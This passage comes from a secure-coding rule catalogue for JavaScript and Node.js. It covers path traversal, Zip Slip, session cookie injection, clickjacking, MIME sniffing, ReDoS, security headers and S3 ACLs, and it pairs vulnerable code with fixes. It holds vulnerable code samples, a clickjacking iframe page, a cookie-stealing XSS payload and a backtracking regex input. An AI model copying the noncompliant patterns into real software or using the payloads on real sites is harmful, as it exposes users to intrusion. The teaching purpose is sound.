  2. Resolve the canonical path of the file by using methods like `fs.realpathSync`. This will resolve relative paths and path components like ../, removing any ambiguity regarding the file’s location.
  3. Check that the canonical path is within the directory where the file should be located.

Important Note: The order of this process pattern is important. The code must follow this order exactly to be secure by design:

  1. data = transform(user_input);
  2. data = normalize(data);
  3. data = sanitize(data);
  4. use(data);

As pointed out in this SonarSource talk, failure to follow this exact order leads to security vulnerabilities.

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation string contains a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string targetDirectory does not end with a path separator:

const path = require('path');
const fs   = require('fs');

function (req, res) {
  const targetDirectory = "/data/app/resources";
  let userFilename = path.join(targetDirectory, req.query.filename);
  userFilename = fs.realpathSync(userFilename);

  if (!userFilename.startsWith(targetDirectory)) {
    return res.status(401).send();
  }

  let data = fs.readFileSync(userFilename);
}

This check can be bypassed because "/Users/Johnny".startsWith("/Users/John") returns true. Thus, for validation, "/Users/John" should actually be "/Users/John/".

Warning: Some functions remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.
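The bypass and its fix reduce to a one-character difference in the validation string:

```javascript
// Without a trailing separator, a sibling directory that merely shares a
// prefix passes the check.
const trusted = "/Users/John";        // unsafe validation string
const trustedFixed = "/Users/John/";  // safe: terminating separator

const attackerControlled = "/Users/Johnny/secret.txt";
```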

Do not use path.resolve as a validator

The official documentation states that if any argument other than the first is an absolute path, any previous argument is discarded.

This means that including untrusted data in any of the parameters and using the resulting string for file operations may lead to a path traversal vulnerability.

Resources

Standards

jssecurity:S6287

Why is this an issue?

Session Cookie Injection occurs when a web application assigns session cookies to users using untrusted data.

Session cookies are used by web applications to identify users. Thus, controlling these cookies enables control over users’ identities within the application.

The injection might occur via a GET parameter, and the payload, for example, https://example.com?cookie=injectedcookie, delivered using phishing techniques.

What is the potential impact?

A well-intentioned user opens a malicious link that injects a session cookie in their web browser. This forces the user into unknowingly browsing a session that isn’t theirs.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Sensitive data disclosure

A victim introduces sensitive data within the attacker’s application session, which the attacker can later retrieve. The implications vary depending on the type of data disclosed: leakage of strictly confidential user data and leakage of organizational data have different impacts.

Vulnerability chaining

An attacker not only manipulates a user into browsing an application using a session cookie of their control but also successfully detects and exploits a self-XSS on the target application.
The victim browses the vulnerable page using the attacker’s session and is affected by the XSS, which can then be used for a wide range of attacks including credential stealing using mirrored login pages.

How to fix it in Express.js

Code examples

The following code is vulnerable to Session Cookie Injection as it assigns a session cookie using untrusted data.

Noncompliant code example

import express from "express";
import cookieParser from "cookie-parser";

const app = express();
app.use(cookieParser());

app.get("/checkcookie", (req, res) => {
    if (req.cookies["connect.sid"] === undefined) {
        const cookie = req.query.cookie;
        res.cookie("connect.sid", cookie); // Noncompliant
    }

    return res.redirect("/welcome");
});

Compliant solution

import express from "express";
import cookieParser from "cookie-parser";

const app = express();
app.use(cookieParser());

app.get("/checkcookie", (req, res) => {
    if (req.cookies["connect.sid"] === undefined) {
        return res.redirect("/getcookie");
    }

    return res.redirect("/welcome");
});

How does this work?

Untrusted data, such as GET or POST request content, should always be considered tainted. Therefore, an application should not blindly assign the value of a session cookie to untrusted data.

Session cookies should be generated using the built-in APIs of secure libraries that include session management instead of developing homemade tools.
Often, these existing solutions benefit from quality maintenance in terms of features, security, or hardening, and it is usually better to use these solutions than to develop your own.

Resources

Standards

jssecurity:S6350

Constructing arguments of system commands from user input is security-sensitive and has led to vulnerabilities in the past.

Arguments of system commands are processed by the executed program. The arguments are usually used to configure and influence the behavior of the programs. Control over a single argument might be enough for an attacker to trigger dangerous features like executing arbitrary commands or writing files into specific directories.

Ask Yourself Whether

  • Malicious arguments can result in undesired behavior in the executed command.
  • Passing user input to a system command is not necessary.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid constructing system commands from user input when possible.
  • Ensure that no risky arguments can be injected for the given program, e.g., type-cast the argument to an integer.
  • Use a more secure interface to communicate with other programs, e.g., the standard input stream (stdin).
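The "type-cast the argument to an integer" practice can be sketched as a strict parser that rejects anything but a plain non-negative integer before it is ever placed in an argument list (the depth parameter is illustrative):

```javascript
// Strict integer validation for a command argument: parse, then verify
// the round-trip so that trailing garbage like "3 -exec" is rejected.
function toSafeDepth(input) {
  const text = String(input).trim();
  const depth = Number.parseInt(text, 10);
  if (!Number.isInteger(depth) || depth < 0 || String(depth) !== text) {
    throw new Error("Invalid depth argument");
  }
  return depth;
}
```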

Sensitive Code Example

Arguments like -delete or -exec for the find command can alter the expected behavior and result in vulnerabilities:

const { spawn } = require("child_process");
const input = req.query.input;
const proc = spawn("/usr/bin/find", [input]); // Sensitive

Compliant Solution

Use an allow-list to restrict the arguments to trusted values:

const { spawn } = require("child_process");
const allowed = ["/var/data", "/var/log"]; // trusted argument values (illustrative)
const input = req.query.input;
if (allowed.includes(input)) {
  const proc = spawn("/usr/bin/find", [input]);
}

See

jssecurity:S6096

Why is this an issue?

Zip slip is a special case of path injection. It occurs when an application uses the name of an archive entry to construct a file path and access this file without validating its path first.

This rule will consider all archives untrusted, assuming they have been created outside the application file system.

A user with malicious intent would inject specially crafted values, such as ../, in the archive entry name to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access.

What is the potential impact?

A web application is vulnerable to Zip Slip and an attacker is able to exploit it by submitting an archive they control.

The files that can be affected are limited by the permissions of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override arbitrary files

The application opens the archive to copy its entries to the file system. The entries' names contain path traversal payloads for existing files in the system, which are overwritten once the entries are copied. The vulnerability is exploited to corrupt files critical for the application or operating system to work properly.

It could result in data being lost or the application being unavailable.

How to fix it in Node.js

Code examples

The following code is vulnerable to Zip Slip as it is constructing a path using an archive entry name. This path is then used to copy a file without being validated first. Therefore, it can be leveraged by an attacker to overwrite arbitrary files.

Noncompliant code example

const AdmZip = require("adm-zip");
const upload = require('multer');

app.get('/example', upload.single('file'), (req, res) => {
    const zip = new AdmZip(req.file.buffer);
    const zipEntries = zip.getEntries();

    zipEntries.forEach(function (zipEntry) {
        var writer = fs.createWriteStream(zipEntry.entryName); // Noncompliant
        writer.write(zipEntry.getData().toString("utf8"));
    });
});

Compliant solution

const AdmZip = require("adm-zip");
const upload = require('multer');

const unzipTargetDir = "/example/directory/";

app.get('/example', upload.single('file'), (req, res) => {
    const zip = new AdmZip(req.file.buffer);
    const zipEntries = zip.getEntries();

    zipEntries.forEach(function (zipEntry) {
        const canonicalPath = path.normalize(unzipTargetDir + zipEntry.entryName);
        if (canonicalPath.startsWith(unzipTargetDir)) {
            let writer = fs.createWriteStream(canonicalPath);
            writer.write(zipEntry.getData().toString("utf8"));
        }
    });
});

How does this work?

The universal way to prevent Zip Slip is to validate the paths constructed from untrusted archive entry names.

The validation should be done as follows:

  1. Resolve the canonical path of the file by using methods like path.join or path.normalize. This will resolve relative paths and path components like ../, removing any ambiguity regarding the file’s location.
  2. Check that the canonical path is within the directory where the file should be located.
  3. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation strings all contain a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string variable targetDirectory does not end with a path separator:

const AdmZip = require("adm-zip");
const fs = require("fs");
const path = require("path");

const targetDirectory = "/Users/John";

app.get('/example', (req, res) => {
    const canonicalPath = path.normalize(targetDirectory + req.query.filename);

    if (canonicalPath.startsWith(targetDirectory)) {
        const zip = new AdmZip(canonicalPath);
        const zipEntries = zip.getEntries();

        zipEntries.forEach(function (zipEntry) {
            var writer = fs.createWriteStream(zipEntry.entryName);
            writer.write(zipEntry.getData().toString("utf8"));
        });
    }
});

This check can be bypassed because "/Users/Johnny".startsWith("/Users/John") returns true. Thus, for validation, "/Users/John" should actually be "/Users/John/".

Warning: Some functions remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.

Here is a real-life example of this vulnerability.

Resources

Documentation

  • snyk - Zip Slip Vulnerability

Standards

javascript:S5732

Clickjacking attacks occur when an attacker tricks a user into clicking on certain buttons or links of a legitimate website. This attack can take place with malicious HTML frames well hidden in an attacker’s website.

For instance, suppose a safe and authentic page of a social network (https://socialnetworkexample.com/makemyprofilpublic) allows a user to change the visibility of their profile by clicking on a button. This is a critical feature with high privacy concerns. Users are generally well informed on the social network about the consequences of this action. An attacker can trick users into performing this action without their consent, using the following code embedded in a malicious website:

<html>
<b>Click on the button below to win 5000$</b>
<br>
<iframe src="https://socialnetworkexample.com/makemyprofilpublic" width="200" height="200"></iframe>
</html>

By playing with the size of the iframe, it is sometimes possible to display only the critical parts of a page, in this case the button of the makemyprofilpublic page.

Ask Yourself Whether

  • Critical actions of the application are prone to clickjacking attacks because a simple click on a link or a button can trigger them.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement the content security policy frame-ancestors directive, which is supported by all modern browsers and specifies the origins of frames allowed to be loaded by the browser (this directive deprecates X-Frame-Options).
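For reference, a raw response header carrying this directive would look like the following (with example.com standing in for the origins you actually want to allow):

```
Content-Security-Policy: frame-ancestors 'self' example.com
```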

Sensitive Code Example

In an Express.js application, the code is sensitive if the helmet-csp or helmet middleware is used without the frameAncestors directive (or if frameAncestors is set to 'none'):

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.contentSecurityPolicy({
    directives: {
      // other directives
      frameAncestors: ["'none'"] // Sensitive: frameAncestors  is set to none
    }
  })
);

Compliant Solution

In an Express.js application, a standard way to implement the CSP frame-ancestors directive is with the helmet-csp or helmet middleware:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.contentSecurityPolicy({
    directives: {
      // other directives
      frameAncestors: ["'example.com'"] // Compliant
    }
  })
);

See

javascript:S5734

MIME confusion attacks occur when an attacker successfully tricks a web browser into interpreting a resource as a different type than the one expected. To correctly interpret a resource (script, image, stylesheet …​), web browsers look for the Content-Type header defined in the HTTP response received from the server, but this header is often missing or set to an incorrect value. To avoid content-type mismatches and to provide the best user experience, web browsers try to deduce the right content type, generally by inspecting the first bytes of the resource. This "guess mechanism" is called MIME type sniffing.

Attackers can take advantage of this feature when a website ("example.com" here) allows users to upload arbitrary files. In that case, an attacker can upload a malicious image fakeimage.png (containing malicious JavaScript code or a polyglot content file) such as:

<script>alert(document.cookie)</script>

When the victim visits the website showing the uploaded image, the malicious script embedded in the image will be executed by web browsers performing MIME type sniffing.

Ask Yourself Whether

  • Content-Type header is not systematically set for all resources.
  • Content of resources can be controlled by users.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Implement the X-Content-Type-Options header with the nosniff value (the only existing value for this header), which is supported by all modern browsers and prevents browsers from performing MIME type sniffing, so that in case of a Content-Type header mismatch, the resource is not interpreted. For example, within a <script> element context, JavaScript MIME types are expected (like application/javascript) in the Content-Type header.
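The corresponding raw response header is simply:

```
X-Content-Type-Options: nosniff
```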

Sensitive Code Example

In an Express.js application, the code is sensitive if, when using helmet, the noSniff middleware is disabled:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet({
    noSniff: false, // Sensitive
  })
);

Compliant Solution

When using helmet in an Express.js application, the noSniff middleware should be enabled (it is also enabled by default):

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(helmet.noSniff());

See

javascript:S6268

Angular prevents XSS vulnerabilities by treating all values as untrusted by default. Untrusted values are systematically sanitized by the framework before they are inserted into the DOM.

Still, developers have the ability to manually mark a value as trusted if they are sure that the value is already sanitized. Accidentally trusting malicious data will introduce an XSS vulnerability in the application and enable a wide range of serious attacks like accessing/modifying sensitive information or impersonating other users.

Ask Yourself Whether

  • The value for which sanitization has been disabled is user-controlled.
  • It’s difficult to understand how this value is constructed.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid including dynamic executable code and thus disabling Angular’s built-in sanitization unless it’s absolutely necessary. Try instead to rely as much as possible on static templates and Angular built-in sanitization to define web page content.
  • Make sure to understand how the value to consider as trusted is constructed and never concatenate it with user-controlled data.
  • Make sure to choose the correct DomSanitizer "bypass" method based on the context. For instance, only use bypassSecurityTrustUrl to trust URLs in an href attribute context.

Sensitive Code Example

import { Component, OnInit } from '@angular/core';
import { DomSanitizer, SafeHtml } from "@angular/platform-browser";
import { ActivatedRoute } from '@angular/router';

@Component({
  template: '<div id="hello" [innerHTML]="hello"></div>'
})
export class HelloComponent implements OnInit {
  hello: SafeHtml;

  constructor(private sanitizer: DomSanitizer, private route: ActivatedRoute) { }

  ngOnInit(): void {
    let name = this.route.snapshot.queryParams.name;
    let html = "<h1>Hello " + name + "</h1>";
    this.hello = this.sanitizer.bypassSecurityTrustHtml(html); // Sensitive
  }
}

Compliant Solution

import { Component, OnInit } from '@angular/core';
import { DomSanitizer } from "@angular/platform-browser";
import { ActivatedRoute } from '@angular/router';

@Component({
  template: '<div id="hello"><h1>Hello {{name}}</h1></div>',
})
export class HelloComponent implements OnInit {
  name: string;

  constructor(private sanitizer: DomSanitizer, private route: ActivatedRoute) { }

  ngOnInit(): void {
    this.name = this.route.snapshot.queryParams.name;
  }
}

See

javascript:S5852

Most regular expression engines use backtracking to try all possible execution paths of the regular expression when evaluating an input. In some cases this can cause performance issues, called catastrophic backtracking situations. In the worst case, the complexity of the regular expression is exponential in the size of the input, which means that a small, carefully crafted input (like 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application. Super-linear regex complexity can lead to the same impact with, in this case, a large carefully crafted input (thousands of chars).

This rule determines the runtime complexity of a regular expression and informs you if it is not linear.

Ask Yourself Whether

  • The input is user-controlled.
  • The input size is not restricted to a small number of characters.
  • There is no timeout in place to limit the regex evaluation time.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

To avoid catastrophic backtracking situations, make sure that none of the following conditions apply to your regular expression.

In all of the following cases, catastrophic backtracking can only happen if the problematic part of the regex is followed by a pattern that can fail, causing the backtracking to actually happen.

  • If you have a repetition r* or r*?, such that the regex r could produce different possible matches (of possibly different lengths) on the same input, the worst case matching time can be exponential. This can be the case if r contains optional parts, alternations or additional repetitions (but not if the repetition is written in such a way that there’s only one way to match it).
  • If you have multiple repetitions that can match the same contents and are consecutive or are only separated by an optional separator or a separator that can be matched by both of the repetitions, the worst case matching time can be polynomial (O(n^c) where c is the number of problematic repetitions). For example a*b* is not a problem because a* and b* match different things and a*_a* is not a problem because the repetitions are separated by a '_' and can’t match that '_'. However, a*a* and .*_.* have quadratic runtime.
  • If the regex is not anchored to the beginning of the string, quadratic runtime is especially hard to avoid because whenever a match fails, the regex engine will try again starting at the next index. This means that any unbounded repetition, if it’s followed by a pattern that can fail, can cause quadratic runtime on some inputs. For example str.split(/\s*,/) will run in quadratic time on strings that consist entirely of spaces (or at least contain large sequences of spaces, not followed by a comma).

In order to rewrite your regular expression without these patterns, consider the following strategies:

  • If applicable, define a maximum number of expected repetitions using the bounded quantifiers, like {1,5} instead of + for instance.
  • Refactor nested quantifiers to limit the number of ways the inner group can be matched by the outer quantifier. For instance, the nested quantifier situation (ba+)+ doesn’t cause performance issues: the inner group can be matched only if there exists exactly one b char per repetition of the group.
  • Optimize regular expressions by emulating possessive quantifiers and atomic grouping.
  • Use negated character classes instead of . to exclude separators where applicable. For example the quadratic regex .*_.* can be made linear by changing it to [^_]*_.*
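As a quick check of the last strategy, the quadratic pattern and its linear rewrite accept exactly the same inputs (any string containing at least one underscore); the sample strings below are illustrative:

```javascript
// Sketch: .*_.* (quadratic) and [^_]*_.* (linear) accept the same strings.
const quadratic = /.*_.*/;
const linear = /[^_]*_.*/;

for (const s of ['a_b', '_', 'ab', 'a_b_c']) {
  // Both tests agree on every input.
  console.log(s, quadratic.test(s), linear.test(s));
}
```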

Sometimes it’s not possible to rewrite the regex to be linear while still matching what you want it to match, especially when the regex is not anchored to the beginning of the string, in which case quadratic runtime is quite hard to avoid. In those cases consider the following approaches:

  • Solve the problem without regular expressions.
  • Use an alternative non-backtracking regex implementation such as Google’s RE2 or node-re2.
  • Use multiple passes. This could mean pre- and/or post-processing the string manually before/after applying the regular expression to it or using multiple regular expressions. One example of this would be to replace str.split(/\s*,\s*/) with str.split(",") and then trimming the spaces from the strings as a second step.
  • It is often possible to make the regex infallible by making all the parts that could fail optional, which will prevent backtracking. Of course this means that you’ll accept more strings than intended, but this can be handled by using capturing groups to check whether the optional parts were matched or not and then ignoring the match if they weren’t. For example the regex x*y could be replaced with x*(y)? and then the call to str.match(regex) could be replaced with matched = str.match(regex) and matched[1] !== undefined.
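The last approach can be sketched like this (the strings are illustrative):

```javascript
// x*y can backtrack when 'y' fails to match; x*(y)? can never fail, so the
// engine never backtracks. The capturing group tells us whether 'y' was
// really matched.
const infallible = /x*(y)?/;

const hit = 'xxxy'.match(infallible);
console.log(hit[1] !== undefined);  // true: 'y' was matched

const miss = 'xxx'.match(infallible);
console.log(miss[1] !== undefined); // false: treat this as "no match"
```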

Sensitive Code Example

The regex evaluation will never end:

/(a+)+$/.test(
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaa!"
); // Sensitive

Compliant Solution

Possessive quantifiers do not keep backtracking positions and thus can be used, where possible, to avoid performance issues. Unfortunately, they are not supported in JavaScript, but one can still mimic them using lookahead assertions and backreferences:

/((?=(a+))\2)+$/.test(
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaa!"
); // Compliant

See

javascript:S5730

Mixed content occurs when a resource is loaded over the HTTP protocol on a website accessed over the HTTPS protocol. Mixed content is therefore not encrypted, is exposed to MITM attacks, and can break the entire level of protection that was desired by implementing encryption with the HTTPS protocol.

The main threat of mixed content is not only the confidentiality of resources but the integrity of the whole website:

  • Passive mixed content (eg: <img src="http://example.com/picture.png">) allows an attacker to access and replace only these resources, like images, with malicious ones that could lead to successful phishing attacks.
  • With active mixed content (eg: <script src="http://example.com/library.js">) an attacker can compromise the entire website, for example by injecting malicious JavaScript code (accessing and modifying the DOM, stealing cookies, etc).

Ask Yourself Whether

  • The HTTPS protocol is in place and external resources are fetched from the website pages.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement the content security policy block-all-mixed-content directive, which is supported by all modern browsers and blocks the loading of mixed content.
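The corresponding raw response header would look like:

```
Content-Security-Policy: block-all-mixed-content
```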

Sensitive Code Example

In an Express.js application, the code is sensitive if the helmet-csp or helmet middleware is used without the blockAllMixedContent directive:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.contentSecurityPolicy({
    directives: {
      "default-src": ["'self'", 'example.com', 'code.jquery.com']
    } // Sensitive: blockAllMixedContent directive is missing
  })
);

Compliant Solution

In an Express.js application, a standard way to block mixed content is to put in place the helmet-csp or helmet middleware with the blockAllMixedContent directive:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.contentSecurityPolicy({
    directives: {
      "default-src": ["'self'", 'example.com', 'code.jquery.com'],
      blockAllMixedContent: [] // Compliant
    }
  })
);

See

javascript:S5736

The HTTP Referer header contains a URL set by web browsers and used by applications to track where the user came from. It is, for instance, a relevant value for web analytics services, but it can cause serious privacy and security problems if the URL contains confidential information. Note that Firefox, for instance, removes path information from the Referer header while browsing privately, to prevent data leaks.

Suppose an e-commerce website asks the user for their credit card number to purchase a product:

<html>
<body>
<form action="/valid_order" method="GET">
Type your credit card number to purchase products:
<input type=text id="cc" value="1111-2222-3333-4444">
<input type=submit>
</form>
</body>

When the above HTML form is submitted, an HTTP GET request will be performed and the requested URL will be https://example.com/valid_order?cc=1111-2222-3333-4444, with the credit card number inside. This is obviously not secure, for these reasons:

  • URLs are stored in the history of browsers.
  • URLs could be accidentally shared when doing copy/paste actions.
  • URLs can be stolen if a malicious person looks at the computer screen of a user.

In addition to these threats, when further requests are performed from the "valid_order" page with a simple, legitimate embedded script like this:

<script src="https://webanalyticservices_example.com/track">

The Referer header, which contains confidential information, will be sent to a third-party web analytics service and cause a privacy issue:

GET /track HTTP/2.0
Host: webanalyticservices_example.com
Referer: https://example.com/valid_order?cc=1111-2222-3333-4444

Ask Yourself Whether

  • Confidential information exists in URLs.
  • The semantics of HTTP methods are not respected (eg: use of a GET method instead of POST when the state of the application is changed).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Confidential information should not be set inside URLs (GET requests) of the application, and a safe Referrer-Policy header (ie: different from unsafe-url or no-referrer-when-downgrade) should be used to control how much information is included in the Referer header.
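The strictest raw response header, matching the compliant solution below, would be:

```
Referrer-Policy: no-referrer
```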

Sensitive Code Example

In an Express.js application, the code is sensitive if the helmet referrerPolicy middleware is disabled or used with no-referrer-when-downgrade or unsafe-url:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.referrerPolicy({
    policy: 'no-referrer-when-downgrade' // Sensitive: no-referrer-when-downgrade is used
  })
);

Compliant Solution

In an Express.js application, a secure solution is to use the helmet referrerPolicy middleware set to no-referrer:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.referrerPolicy({
    policy: 'no-referrer' // Compliant
  })
);

See

javascript:S5739

When implementing the HTTPS protocol, websites usually continue to support the HTTP protocol in order to redirect users to HTTPS when they request an HTTP version of the website. These redirects are not encrypted and are therefore vulnerable to man-in-the-middle attacks. The Strict-Transport-Security policy header (HSTS) set by an application instructs the web browser to convert any HTTP request to HTTPS.

Web browsers that see the Strict-Transport-Security policy header for the first time record the information specified in the header:

  • the max-age directive, which specifies how long the policy should be kept by the web browser.
  • the includeSubDomains optional directive, which specifies whether the policy should apply to all subdomains.
  • the preload optional directive, which is not part of the HSTS specification but is supported by all modern web browsers.

With the preload directive, the web browser never connects to the website over HTTP. To use this directive, the concerned application must be submitted to a preload service maintained by Google.

Ask Yourself Whether

  • The website is accessible with the unencrypted HTTP protocol.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement the Strict-Transport-Security policy header. It is recommended to apply this policy to all subdomains (includeSubDomains) and for at least 6 months (max-age=15552000), or even better for 1 year (max-age=31536000).
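With these recommended values, the raw response header would look like:

```
Strict-Transport-Security: max-age=31536000; includeSubDomains
```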

Sensitive Code Example

In an Express.js application, the code is sensitive if the helmet or hsts middleware is disabled or used without the recommended values:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(helmet.hsts({
  maxAge: 3153600, // Sensitive, recommended >= 15552000
  includeSubDomains: false // Sensitive, recommended 'true'
}));

Compliant Solution

In an Express.js application, a standard way to implement HSTS is with the helmet or hsts middleware:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(helmet.hsts({
  maxAge: 31536000,
  includeSubDomains: true
})); // Compliant

See

javascript:S6265

Predefined permissions, also known as canned ACLs, are an easy way to grant large privileges to predefined groups or users.

The following canned ACLs are security-sensitive:

  • PUBLIC_READ, PUBLIC_READ_WRITE grant respectively "read" and "read and write" privileges to anyone, either authenticated or anonymous (AllUsers group).
  • AUTHENTICATED_READ grants "read" privilege to all authenticated users (AuthenticatedUsers group).

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, css …​).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege policy, i.e., to grant users only the permissions necessary for their required tasks. In the context of canned ACLs, set the ACL to PRIVATE (the default), and if more granularity is needed, use an appropriate S3 policy.

Sensitive Code Example

All users, either authenticated or anonymous, have read and write permissions with the PUBLIC_READ_WRITE access control:

const s3 = require('aws-cdk-lib/aws-s3');
const s3deploy = require('aws-cdk-lib/aws-s3-deployment');

new s3.Bucket(this, 'bucket', {
    accessControl: s3.BucketAccessControl.PUBLIC_READ_WRITE // Sensitive
});

new s3deploy.BucketDeployment(this, 'DeployWebsite', {
    accessControl: s3.BucketAccessControl.PUBLIC_READ_WRITE // Sensitive
});

Compliant Solution

With the PRIVATE access control (default), only the bucket owner has the read/write permissions on the bucket and its ACL.

const s3 = require('aws-cdk-lib/aws-s3');
const s3deploy = require('aws-cdk-lib/aws-s3-deployment');

new s3.Bucket(this, 'bucket', {
    accessControl: s3.BucketAccessControl.PRIVATE
});

new s3deploy.BucketDeployment(this, 'DeployWebsite', {
    accessControl: s3.BucketAccessControl.PRIVATE
});

See

javascript:S5743

By default, web browsers perform DNS prefetching to reduce the latency of DNS resolutions required when a user clicks links on a website page.

For instance on example.com the hyperlink below contains a cross-origin domain name that must be resolved to an IP address by the web browser:

<a href="https://otherexample.com">go on our partner website</a>

Resolving many cross-origin domain names can add significant latency to requests, especially if the page contains many links to cross-origin domains. DNS prefetching allows web browsers to perform DNS resolution in the background before the user clicks a link. This feature can cause privacy issues, because DNS resolution from the user’s computer is performed without their consent if they don’t intend to visit the linked website.

On a complex private webpage, a combination of unique links/DNS resolutions can indicate, to an eavesdropper for instance, that the user is visiting the private page.

Ask Yourself Whether

  • Links to cross-origin domains could leak confidential information about the user’s navigation/behavior on the website.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement the X-DNS-Prefetch-Control header with an off value, keeping in mind that this could significantly degrade website performance.
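The corresponding raw response header would be:

```
X-DNS-Prefetch-Control: off
```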

Sensitive Code Example

In an Express.js application, the code is sensitive if the dns-prefetch-control middleware is disabled or used without the recommended value:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.dnsPrefetchControl({
    allow: true // Sensitive: allowing DNS prefetching is security-sensitive
  })
);

Compliant Solution

In an Express.js application, the dns-prefetch-control or helmet middleware is the standard way to implement the X-DNS-Prefetch-Control header:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.dnsPrefetchControl({
    allow: false // Compliant
  })
);

See

javascript:S2598

Why is this an issue?

If the file upload feature is implemented without proper folder restriction, it will result in an implicit trust violation within the server, as trusted files will be implicitly stored alongside third-party files that should be considered untrusted.

This can allow an attacker to disrupt the security of an internal server process or the running application.

What is the potential impact?

After discovering this vulnerability, attackers may attempt to upload as many different file types as possible, such as JavaScript files, Bash scripts, malware, or malicious configuration files targeting potential processes.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Full application compromise

In the worst-case scenario, the attackers succeed in uploading a file recognized by an internal tool, triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

Server Resource Exhaustion

By repeatedly uploading large files, an attacker can consume excessive server resources, resulting in a denial of service.

If the component affected by this vulnerability is not a bottleneck that acts as a single point of failure (SPOF) within the application, the denial of service can only affect the attacker who caused it.

Even though a denial of service might have little direct impact, it can have secondary impact in architectures that use containers and container orchestrators. For example, it can cause unexpected container failures or overuse of resources.

In some cases, it is also possible to force the product to "fail open" when resources are exhausted, which means that some security features are disabled in an emergency.

These threats are particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

How to fix it in Formidable

Code examples

Noncompliant code example

const Formidable = require('formidable');

const form          = new Formidable(); // Noncompliant
form.uploadDir      = "/tmp/";
form.keepExtensions = true;

Compliant solution

const Formidable = require('formidable');

const form          = new Formidable();
form.uploadDir      = "/uploads/";
form.keepExtensions = false;

How does this work?

Use pre-approved folders

Create a special folder where untrusted data should be stored. This folder should be classified as untrusted and have the following characteristics:

  • It should have specific read and write permissions that belong to the right people or organizations.
  • It should have a size limit or its size should be monitored.
  • It should contain backup copies if it contains data that belongs to users.

This folder should not be located in /tmp, /var/tmp or in the Windows directory %TEMP%.
These folders are usually "world-writable", can be manipulated, and can be accidentally deleted by the system.

Also, the original file names and extensions should be changed to controlled strings to prevent unwanted code from being executed based on the file names.

Resources

javascript:S5742

Certificate Transparency (CT) is an open framework to protect against identity theft when certificates are issued. Certificate Authorities (CAs) electronically sign certificates after verifying the identity of the certificate owner. Attackers use, among other things, social engineering attacks to trick a CA into incorrectly verifying a spoofed identity/forged certificate.

CAs implement the Certificate Transparency framework by publicly logging the records of newly issued certificates, allowing the public, and in particular the identity owner, to monitor these logs and verify that their identity has not been usurped.

Ask Yourself Whether

  • The website identity is valuable and well-known, therefore prone to theft.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement the Expect-CT HTTP header, which instructs the web browser to check public CT logs to verify that the website appears in them; if it does not, the browser will block the request and display a warning to the user.
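For an enforcing deployment, the raw response header would look like:

```
Expect-CT: max-age=86400, enforce
```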

Sensitive Code Example

In an Express.js application, the code is sensitive if the expect-ct middleware is disabled:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
    helmet({
      expectCt: false // Sensitive
    })
);

Compliant Solution

In an Express.js application, the expect-ct middleware is the standard way to implement Expect-CT. Usually, the deployment of this policy starts in report-only mode (enforce: false) with a low maxAge value (the number of seconds the policy will apply). Then, if everything works well, it is recommended to block future connections that violate the Expect-CT policy (enforce: true) and to set a greater value for the maxAge directive:

const express = require('express');
